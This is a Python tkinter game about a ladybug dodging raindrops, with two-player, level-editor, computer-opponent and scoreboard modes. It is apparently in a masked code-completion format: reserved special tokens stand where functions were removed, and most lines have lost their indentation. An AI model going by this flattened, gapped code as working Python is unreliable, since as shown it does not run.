- data.r and bug.x <= data. player1X + data.r): data.winner = 'player2' if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y + data.r): if (bug.x >= data.player2X - data.r and bug.x <= data. 
player2X + data.r): data.winner = 'player1' def drawPowerups(canvas, data): for bug in data.scaryBug: bug.draw(canvas, data) for powerUp in data.powerUps: powerUp.draw(canvas, data) for powerUp in data.invincible: powerUp.draw(canvas, data) def drawHome(canvas, data): canvas.create_image(data.homeX, data.homeY, image=data.home) <|reserved_special_token_0|> def powerUpCoconutShot(data): if data.time % 60 == 0 and data.time % 120 != 0: Position = random.choice(data.spotList) data.powerUps.append(PowerUps(Position, 0)) if data.time % 50 == 0: Position = random.choice(data.spotList) data.invincible.append(Invincible(Position, 0)) if data.time % 100 == 0: Position = random.choice(data.spotList) data.scaryBug.append(ScaryBug(Position, 750)) <|reserved_special_token_0|> def playerRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts: coconut.draw(canvas) drawPowerups(canvas, data) canvas.create_image(data.cx, data.cy, image=data.ladyBug) canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level, font='Arial 18 bold', fill='yellow') canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score, font='Arial 18 bold', fill='yellow') canvas.create_text(2 * data.width / 3, 660, text= """The greater the level, the more points get added to your score!""" , font='Arial 15 bold', fill='yellow') if data.hit == True: canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. deadScreen) canvas.create_text(data.width / 2, data.height / 4, text= 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold', fill='yellow') canvas.create_text(data.width / 2, 280, text='Score: %d' % data. 
score, font='Arial 13 bold', fill='yellow') if data.level >= 8: madeIt(canvas, data) drawHome(canvas, data) def madeIt(canvas, data): canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 70, text='You Made it!', font= 'Arial 23 bold', fill='yellow') canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score, font='Arial 15 bold', fill='yellow') canvas.create_text(data.width / 2, 375, text= 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow') canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, 450, fill='white') canvas.create_text(data.width / 2, 425, text=data.name) def drop2Player(data): if data.winner == None and data.pauseDrops == False: if data.time % 15 == 0: xPosition1 = random.randint(0, 385) if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25: if data.pause1Drop != True: data.coconuts1.append(Coconuts(xPosition1, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(xPosition1 + 410, 0)) if data.time % 12 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.coconuts1.append(Coconuts(140, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(540, 0)) elif side == 'r': if data.pause1Drop != True: data.coconuts1.append(Coconuts(344, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(755, 0)) powerupDrop2Player(data) def powerupDrop2Player(data): if data.time % 45 == 0 and data.time % 90 != 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.powerUps.append(PowerUps(140, 0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(540, 0)) elif side == 'r': if data.pause1Drop != True: data.powerUps.append(PowerUps(344, 0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(755, 0)) if data.time % 60 == 0: side = 
random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.invincible.append(Invincible(140, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(540, 0)) elif side == 'r': if data.pause1Drop != True: data.invincible.append(Invincible(344, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(755, 0)) if data.time % 90 == 0: side = random.choice(data.sides) if side == 'l': data.scaryBug.append(ScaryBug(140, 750)) data.scaryBug.append(ScaryBug(540, 750)) elif side == 'r': data.scaryBug.append(ScaryBug(344, 750)) data.scaryBug.append(ScaryBug(755, 750)) <|reserved_special_token_0|> def twoPlayerMousePressed(event, data): checkHome(event, data) def twoPlayerTimerFired(data): if data.winner == None: data.player1Y -= data.speed if data.player1Y < 15 and data.player2Y > 15: data.winner = 'player1' if data.player1Y > 40: data.time += 1 drop2Player(data) data.player2Y -= data.speed if data.player2Y < 15 and data.player1Y > 15: data.winner = 'player2' if data.player2Y > 40: data.time += 1 drop2Player(data) if data.player1Y < 15 and data.player2Y < 15: data.winner = 'tie' for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) powerupTimerFired(data) def powerupTimerFired(data): for coconut in data.coconuts1: if data.pause1Drop == False: coconut.onTimerFired(data) hit2Player(data) for coconut in data.coconuts2: if data.pause2Drop == False: coconut.onTimerFired(data) if data.start1 != None: if abs(data.start1 - data.player1Y) >= 120: data.pause1Drop = False data.Invincible1 = False if data.start2 != None: if abs(data.start2 - data.player2Y) >= 120: data.pause2Drop = False data.Invincible2 = False def twoPlayerRedrawAll(canvas, data): canvas.create_image(data.width / 4, data.height / 2, image=data. 
halfBackground) canvas.create_image(3 * data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10 ) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts1: coconut.draw(canvas) for coconut in data.coconuts2: coconut.draw(canvas) drawPowerups(canvas, data) canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug) canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug) canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill= 'yellow') canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill ='yellow') winner(canvas, data) drawHome(canvas, data) def winner(canvas, data): if data.winner == 'player1': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! Player 1', font='Arial 23 bold', fill='yellow') elif data.winner == 'player2': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! Player 2', font='Arial 23 bold', fill='yellow') elif data.winner == 'tie': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'Tie! 
You Both Made it!', font='Arial 23 bold', fill='yellow') def editorKeyPressed(event, data): if event.keysym == 'r': init(data) def editorMousePressed(event, data): checkHome(event, data) if data.easyY - data.r <= event.y <= data.easyY + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.yourSpeed = 'slow' data.slow = data.click data.medium, data.fast = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.yourSpeed = 'medium' data.medium = data.click data.slow, data.fast = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.yourSpeed = 'fast' data.fast = data.click data.slow, data.medium = data.notClick, data.notClick checkMiddle(event, data) checkLast(event, data) def checkMiddle(event, data): if data.medX - data.r <= event.y <= data.medX + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.rainSpeed = 'drizzle' data.drizzle = data.click data.rain, data.thunderstorm = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.rainSpeed = 'rain' data.rain = data.click data.drizzle, data.thunderstorm = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.rainSpeed = 'thunderstorm' data.thunderstorm = data.click data.drizzle, data.rain = data.notClick, data.notClick <|reserved_special_token_0|> def drawButtons(canvas, data): data.font, data.fill = 'Helvetica 13 bold', 'yellow' canvas.create_text(data.medX, data.YST, text='Your Speed:', font=data. 
font, fill=data.fill) canvas.create_image(data.easyX, data.easyY, image=data.slow) canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font) canvas.create_image(data.medX, data.easyY, image=data.medium) canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font) canvas.create_image(data.hardX, data.easyY, image=data.fast) canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font) canvas.create_image(data.easyX, data.medX, image=data.drizzle) canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data. font, fill=data.fill) canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font) canvas.create_image(data.medX, data.medX, image=data.rain) canvas.create_text(data.medX, data.medX, text='Rain', font=data.font) canvas.create_image(data.hardX, data.medX, image=data.thunderstorm) canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font) canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data. font, fill=data.fill) canvas.create_image(data.easyY, data.last, image=data.yes) canvas.create_text(data.easyY, data.last, text='Yes', font=data.font) canvas.create_image(data.last, data.last, image=data.no) canvas.create_text(data.last, data.last, text='No', font=data.font) changeEnter(canvas, data) def changeEnter(canvas, data): if (data.powerUpsEditor != None and data.yourSpeed != None and data. 
rainSpeed != None):
        data.enter = data.click
    canvas.create_image(data.medX, data.enterX, image=data.enter)
    canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)


def editorTimerFired(data):
    """Advance the level-editor background rain: spawn a drop every
    other tick and move every existing drop."""
    data.editorTime += 1
    if data.editorTime % 2 == 0:
        rainDrop(data)
    for drop in data.editorDrops:
        drop.onTimerFired(data)


def rainDrop(data):
    """Append one decorative raindrop at a random x along the top edge."""
    xPosition = random.randint(0, data.width)
    data.editorDrops.append(Coconuts(xPosition, 0))


def editorRedrawAll(canvas, data):
    """Draw the level-editor screen: background, falling rain, title,
    the option buttons, and the home button."""
    canvas.create_image(data.width / 2, data.height / 2, image=data.background)
    canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)
    for drop in data.editorDrops:
        drop.draw(canvas)
    canvas.create_text(data.width / 2, data.S_P - 10, text=
        'Edit Your Level!', font='Arial 23 bold', fill='yellow')
    drawButtons(canvas, data)
    drawHome(canvas, data)


def setEverything(data):
    """Translate the editor's label choices into numeric speeds.

    data.yourSpeed ('slow'/'medium'/'fast') sets the climb speed;
    data.rainSpeed ('thunderstorm'/'rain'/'drizzle') sets data.rSpeed.
    NOTE(review): rSpeed is consumed by the (elsewhere-defined) drop
    spawner; a smaller value appears to mean heavier rain -- confirm.
    """
    if data.yourSpeed == 'slow':
        data.speed = 6
    elif data.yourSpeed == 'medium':
        data.speed = 10
    elif data.yourSpeed == 'fast':
        data.speed = 14
    if data.rainSpeed == 'thunderstorm':
        data.rSpeed = 7
    elif data.rainSpeed == 'rain':
        data.rSpeed = 10
    elif data.rainSpeed == 'drizzle':
        data.rSpeed = 13


<|reserved_special_token_0|>


def levelPowerUp(data):
    """When the editor enabled power-ups, periodically spawn them in the
    created level: pause power-ups (PowerUps), invincibility
    (Invincible) from the top, and ScaryBugs from the bottom (y=750),
    each in a random climbing lane from data.spotList."""
    if data.powerUpsEditor == True:
        if data.time % 20 == 0 and data.time % 40 != 0:
            Position = random.choice(data.spotList)
            data.powerUps.append(PowerUps(Position, 0))
        if data.time % 30 == 0:
            Position = random.choice(data.spotList)
            data.invincible.append(Invincible(Position, 0))
        if data.time % 35 == 0:
            Position = random.choice(data.spotList)
            data.scaryBug.append(ScaryBug(Position, 750))


<|reserved_special_token_0|>


def levelCreatedMousePressed(event, data):
    """Only click interaction in a created level: the home button
    (checkHome, defined elsewhere)."""
    checkHome(event, data)


def levelCreatedTimerFired(data):
    """Per-tick update for a player-built level.

    Re-applies the editor settings, climbs the bug at the chosen speed
    while lives remain, counts reaching the top (cy < 15) as finishing
    the level, and delegates raindrop spawning to levelCoconutShot.
    """
    setEverything(data)
    if data.levelEditorLives > 0:
        data.cy -= data.speed
    if data.cy < 15:
        data.level += 1
    if data.cy > 40:
        data.time += 1
        if data.pauseDrops != True:
            levelCoconutShot(data)
    if data.powerUpsEditor == False:
        for coconut in data.coconuts:
            coconut.onTimerFired(data)
            hit(data)
if data.powerUpsEditor == True: for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) for coconut in data.coconuts: if data.pauseDrops == False: coconut.onTimerFired(data) if data.beInvincible == False: hit(data) if data.start != None: if abs(data.start - data.cy) >= 120: data.pauseDrops, data.beInvincible = False, False def levelCreatedRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts: coconut.draw(canvas) if data.powerUpsEditor == True: drawPowerups(canvas, data) canvas.create_image(data.cx, data.cy, image=data.ladyBug) canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data. levelEditorLives, font='Arial 20 bold', fill='yellow') canvas.create_text(data.width / 2, 660, text= """You lose a life for hitting a drop & don't get eaten!""", font='Arial 15 bold', fill='yellow') if data.levelEditorLives <= 0: canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. deadScreen) canvas.create_text(data.width / 2, data.height / 4, text= 'You Lose! 
Better Luck Next Time!', font='Helvetica 23 bold', fill='yellow') if data.level > 1: winEditor(canvas, data) drawHome(canvas, data) def winEditor(canvas, data): canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text='You Made it!', font= 'Arial 23 bold', fill='yellow') <|reserved_special_token_0|> def difficultyMousePressed(event, data): checkHome(event, data) if data.easyY - data.r <= event.y <= data.easyY + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.difficulty = data.difS data.slow = data.click data.medium, data.fast = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.difficulty = data.difM data.medium = data.click data.slow, data.fast = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.difficulty = data.difH data.fast = data.click data.slow, data.medium = data.notClick, data.notClick if data.enter == data.click: if data.enterY - data.r <= event.y <= data.enterY + data.r: if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.mode = 'AI' def difficultyTimerFired(data): data.editorTime += 1 if data.editorTime % 2 == 0: rainDrop(data) for drop in data.editorDrops: drop.onTimerFired(data) def rainDrop(data): xPosition = random.randint(0, data.width) data.editorDrops.append(Coconuts(xPosition, 0)) def difficultyRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.height / 2, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) drawDifficulties(canvas, data) drawHome(canvas, data) def hitAI1(data, distance): for coconut in data.coconutsAI1: if (data.player1Y - data.r - coconut.y <= distance and data. 
switchOnProgress == False): if (coconut.x >= data.player1X - data.r and coconut.x <= data. player1X + data.r or AISwitchBug(data, distance) == True): testInt = random.randint(0, 9) if testInt <= data.difficulty: data.switchOnProgress = True if data.player1X == 150: data.player1X = 340 else: data.player1X = 150 data.switchOnProgress = False if (coconut.y >= data.player1Y - data.r and coconut.y <= data. player1Y + data.r): if (coconut.x >= data.player1X - data.r and coconut.x <= data. player1X + data.r): data.player1Y += 50 data.coconutsAI1.remove(coconut) def AISwitchBug(data, distance): for scaryBug in data.scaryBug: if (data.player1Y - data.r - scaryBug.y <= distance and data. switchOnProgress == False): if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data .player1X + data.r): return True def hitAI2(data, distance): for coconut in data.coconutsAI2: if (coconut.y >= data.player2Y - data.r and coconut.y <= data. player2Y + data.r): if (coconut.x >= data.player2X - data.r and coconut.x <= data. 
player2X + data.r): data.player2Y += 50 data.coconutsAI2.remove(coconut) def coconutShotAI(data): if data.winner == None: if data.time % 15 == 0: xPosition1 = random.randint(0, 385) if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40: if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(xPosition1, 0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0)) if data.time % 8 == 0: xPosition2 = random.randint(0, 80) xPosition3 = random.randint(364, 385) if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(xPosition2, 0)) data.coconutsAI1.append(Coconuts(xPosition3, 0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0)) data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0)) addExtraCoconut(data) addPowerUpsAI(data) <|reserved_special_token_0|> def addPowerUpsAI(data): if data.time % 33 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.invincible.append(Invincible(140, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(550, 0)) elif side == 'r': if data.pause1Drop != True: data.invincible.append(Invincible(344, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(755, 0)) if data.time % 66 == 0: side = random.choice(data.sides) if side == 'l': data.scaryBug.append(ScaryBug(140, 750)) data.scaryBug.append(ScaryBug(550, 750)) elif side == 'r': data.scaryBug.append(ScaryBug(344, 750)) data.scaryBug.append(ScaryBug(750, 750)) <|reserved_special_token_0|> def AITimerFired(data): if data.winner == None: if data.Invincible1 == False: hitAI1(data, 31) if data.Invincible2 == True: pass elif data.Invincible2 == False: hitAI2(data, 31) for coconut in data.coconutsAI1: if data.pause1Drop == False: coconut.onTimerFired(data) for coconut in data.coconutsAI2: if data.pause2Drop == False: coconut.onTimerFired(data) if data.Invincible1 == False: hitAI1(data, 13) if data.Invincible2 == True: pass elif data.Invincible2 == False: 
hitAI2(data, 13) data.player1Y -= data.speedAI if data.player1Y < 15 and data.player2Y > 15: data.winner = 'player1' if data.player1Y > 40: data.time += 1 coconutShotAI(data) data.player2Y -= data.speedAI if data.player2Y < 15 and data.player1Y > 15: data.winner = 'player2' if data.player2Y > 40: data.time += 1 coconutShotAI(data) if data.player1Y < 15 and data.player2Y < 15: data.winner = 'tie' for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) powerUpAITimerFired(data) def powerUpAITimerFired(data): for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) if data.start1 != None: if abs(data.start1 - data.player1Y) >= 120: data.pause1Drop = False data.Invincible1 = False if data.start2 != None: if abs(data.start2 - data.player2Y) >= 120: data.pause2Drop = False data.Invincible2 = False <|reserved_special_token_0|> def AIWinner(canvas, data): if data.winner == 'player1': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text='The Computer Won :(', font='Arial 23 bold', fill='yellow') elif data.winner == 'player2': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! You Won!', font='Arial 23 bold', fill='yellow') elif data.winner == 'tie': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'Tie! 
You Both Made it!', font='Arial 23 bold', fill='yellow') def scoreboardKeyPressed(event, data): if event.keysym == 'r': init(data) def scoreboardMousePressed(event, data): checkHome(event, data) def scoreboardTimerFired(data): difficultyTimerFired(data) def scoreboardRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.tbgY, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!', font='Arial 30 bold', fill='yellow') canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font= 'Arial 20 bold', fill='yellow') drawHome(canvas, data) data.savedScores data.savedScores = readFile('score.txt') score = data.savedScores.splitlines() scores = [] for line in score: scores.append(line.split(',')) scores = sorted(scores, key=lambda x: int(x[0])) top5 = scores[-data.numScores:] top5.reverse() for i in range(len(top5)): canvas.create_text(data.width / 2, data.scoreShift + i * 50, text= top5[i], font='Arial 18 bold', fill='yellow') def helpKeyPressed(event, data): if event.keysym == 'r': init(data) <|reserved_special_token_0|> def helpRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen) for drop in data.editorDrops: drop.draw(canvas) drawHome(canvas, data) def run(width=15000, height=25000): def redrawAllWrapper(canvas, data): canvas.delete(ALL) redrawAll(canvas, data) canvas.update() def mousePressedWrapper(event, canvas, data): mousePressed(event, data) redrawAllWrapper(canvas, data) def keyPressedWrapper(event, canvas, data): keyPressed(event, data) redrawAllWrapper(canvas, data) def timerFiredWrapper(canvas, data): timerFired(data) redrawAllWrapper(canvas, data) canvas.after(data.timerDelay, timerFiredWrapper, canvas, data) class Struct(object): pass data = Struct() data.width = width data.height = height data.timerDelay = 100 root = Tk() init(data) canvas = 
Canvas(root, width=data.width, height=data.height) canvas.pack() root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas, data)) root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data)) timerFiredWrapper(canvas, data) root.mainloop() print('bye!') <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def init(data): data.score = 0 data.mode = 'splashScreen' data.timerDelay = 100 data.height = 800 data.width = 800 data.speed = 10 data.speedAI = 12 data.speedAI2 = 12 data.switchOnProgress = False data.r = 25 data.cx = 280 data.cy = 750 data.onLeft1, data.onLeft2 = True, True data.win = False data.coconuts = [] data.powerUps = [] data.coconuts1 = [] data.coconuts2 = [] data.coconutsAI1 = [] data.coconutsAI2 = [] data.invincible = [] data.pauseDrops = False data.pause1Drop = False data.pause2Drop = False init1(data) <|reserved_special_token_0|> def init2(data): data.tbg = PhotoImage(file='tbg2.gif') data.click = PhotoImage(file='click.gif') data.notClick = PhotoImage(file='notClick.gif') data.player1X = 150 data.player1Y = 750 data.player2X = 550 data.player2Y = 750 data.winner = None data.speed = 12 data.speed2 = 12 data.editorTime = 0 data.editorDrops = [] data.margin = 100 data.enter = False data.powerUpsEditor = None data.yourSpeed = None data.rainSpeed = None data.slow = data.notClick data.medium = data.notClick data.fast = data.notClick data.drizzle = data.notClick data.rain = data.notClick data.thunderstorm = data.notClick init3(data) def init3(data): data.yes = data.notClick data.no = data.notClick data.enter = data.notClick data.levelEditorLives = 2 data.rSpeed = None data.start = None data.start1 = None data.start2 = None data.difficulty = None data.mode1 = data.notClick data.mode2 = data.notClick data.mode3 = data.notClick data.mode4 = data.notClick data.mode5 = data.notClick data.mode6 = data.notClick data.home = PhotoImage(file='home.gif') data.helpScreen = PhotoImage(file='help1.gif') 
data.title = PhotoImage(file='title.gif') data.scoreList = [] data.spotList = [270, 364, 458, 552, 646, 740] data.savedScores = readFile('score.txt') if data.mode == 'levelCreated': setEverything(data) initsplashScreenNumbers(data) def initsplashScreenNumbers(data): data.splashButtonY = 425 data.p1ButtonX = 225 data.p2ButtonX = 290 data.edButton = 355 data.diffButton = 425 data.helpButton = 490 data.sboardButton = 555 data.hitPenalty = 75 data.splashText = data.height / 2 - 20 data.lives = 2 data.levelMax = 8 data.lane = 94 data.Player1Min = 270 data.Player1Max = 740 data.homeX = 50 data.homeY = 650 initScoreBoardHelp(data) init1Player(data) <|reserved_special_token_0|> def init1Player(data): data.buffer = 40 def initAI(data): data.AITY = 225 data.easyX = 200 data.easyY = 300 data.medX = 400 data.hardX = 600 data.enterY = 450 data.difS = 4 data.difM = 6 data.difH = 8 data.last = 500 data.enterX = 575 data.PUT = 450 data.RST = 350 data.YST = 250 def mousePressed(event, data): if data.mode == 'splashScreen': splashScreenMousePressed(event, data) elif data.mode == '1Player': playerMousePressed(event, data) elif data.mode == '2Player': twoPlayerMousePressed(event, data) elif data.mode == 'editor': editorMousePressed(event, data) elif data.mode == 'levelCreated': levelCreatedMousePressed(event, data) elif data.mode == 'AI': AIMousePressed(event, data) elif data.mode == 'difficulty': difficultyMousePressed(event, data) elif data.mode == 'scoreboard': scoreboardMousePressed(event, data) elif data.mode == 'help': helpMousePressed(event, data) <|reserved_special_token_0|> def timerFired(data): if data.mode == 'splashScreen': splashScreenTimerFired(data) elif data.mode == '1Player': playerTimerFired(data) elif data.mode == '2Player': twoPlayerTimerFired(data) elif data.mode == 'editor': editorTimerFired(data) elif data.mode == 'levelCreated': levelCreatedTimerFired(data) elif data.mode == 'AI': AITimerFired(data) elif data.mode == 'difficulty': difficultyTimerFired(data) 
elif data.mode == 'scoreboard': scoreboardTimerFired(data) elif data.mode == 'help': helpTimerFired(data) def redrawAll(canvas, data): if data.mode == 'splashScreen': splashScreenRedrawAll(canvas, data) elif data.mode == '1Player': playerRedrawAll(canvas, data) elif data.mode == '2Player': twoPlayerRedrawAll(canvas, data) elif data.mode == 'editor': editorRedrawAll(canvas, data) elif data.mode == 'levelCreated': levelCreatedRedrawAll(canvas, data) elif data.mode == 'AI': AIRedrawAll(canvas, data) elif data.mode == 'difficulty': difficultyRedrawAll(canvas, data) elif data.mode == 'scoreboard': scoreboardRedrawAll(canvas, data) elif data.mode == 'help': helpRedrawAll(canvas, data) <|reserved_special_token_0|> def splashKeyPressed(event, data): pass def splashScreenTimerFired(data): data.splashScreenTime += 1 if data.splashScreenTime % 2 == 1: rainDropSplash(data) for drop in data.splashScreenDrops: drop.onTimerFired(data) def splashScreenButtons(canvas, data): canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1) canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2) canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3) canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4) canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5) canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6 ) def rainDropSplash(data): xPosition = random.randint(0, 800) data.splashScreenDrops.append(Coconuts(xPosition, 0)) def splashScreenRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.splashText - 10, image=data.title) for drop in data.splashScreenDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.splashText, text= """ 1.) Single Player Level Mode 2.) Two-Player Mode 3.) Level Creator Practice Mode 4.) Play Against the Computer 5.) Help and Instructions 6.) 
Scoreboard """ , font='Arial 14 bold', fill='yellow') splashScreenButtons(canvas, data) def writeFile(path, contents): with open(path, 'wt') as f: f.write(contents) def readFile(path): with open(path, 'rt') as f: return f.read() class Coconuts(object): def __init__(self, x, y): self.x = x self.y = y self.r = 9 self.fill = 'deep sky blue' self.speed = 30 self.outline = 'blue' def draw(self, canvas): canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r, self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill= self.fill, outline=self.outline, width=3) def onTimerFired(self, data): self.y += self.speed def hit(data): for coconut in data.coconuts: if data.mode == '1Player' or data.mode == 'levelCreated': if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r: if (coconut.x >= data.cx - data.r and coconut.x <= data.cx + data.r): data.cy += data.hitPenalty if data.mode == 'levelCreated': data.lives -= 1 elif data.hit == False and data.level < data.levelMax: data.score -= data.level data.coconuts.remove(coconut) if data.mode == 'levelCreated': data.levelEditorLives -= 1 def hit2Player(data): if data.mode == '2Player': if data.Invincible1 == False: for coconut in data.coconuts1: if (coconut.y >= data.player1Y - data.r and coconut.y <= data.player1Y + data.r): if (coconut.x >= data.player1X - data.r and coconut.x <= data.player1X + data.r): data.player1Y += data.hitPenalty data.coconuts1.remove(coconut) if data.Invincible2 == False: for coconut in data.coconuts2: if (coconut.y >= data.player2Y - data.r and coconut.y <= data.player2Y + data.r): if (coconut.x >= data.player2X - data.r and coconut.x <= data.player2X + data.r): data.player2Y += data.hitPenalty data.coconuts2.remove(coconut) class PowerUps(Coconuts): def __init__(self, x, y): super().__init__(x, y) def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.hourGlass) def hitPause(data): for powerUp in data.powerUps: if data.mode == '1Player' or data.mode == 
'levelCreated': if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r: if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx + data.r): data.pauseDrops = True data.start = data.cy data.powerUps.remove(powerUp) elif data.mode == '2Player' or data.mode == 'AI': if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data. player1Y + data.r): if (powerUp.x >= data.player1X - data.r and powerUp.x <= data.player1X + data.r): data.pause1Drop = True data.start1 = data.player1Y data.powerUps.remove(powerUp) if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data. player2Y + data.r): if (powerUp.x >= data.player2X - data.r and powerUp.x <= data.player2X + data.r): data.pause2Drop = True data.start2 = data.player2Y data.powerUps.remove(powerUp) class Invincible(PowerUps): def __init__(self, x, y): super().__init__(x, y) def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.umbrella) def hitInvincible(data): for powerUp in data.invincible: if data.mode == '1Player' or data.mode == 'levelCreated': if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r: if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx + data.r): data.beInvincible = True data.start = data.cy 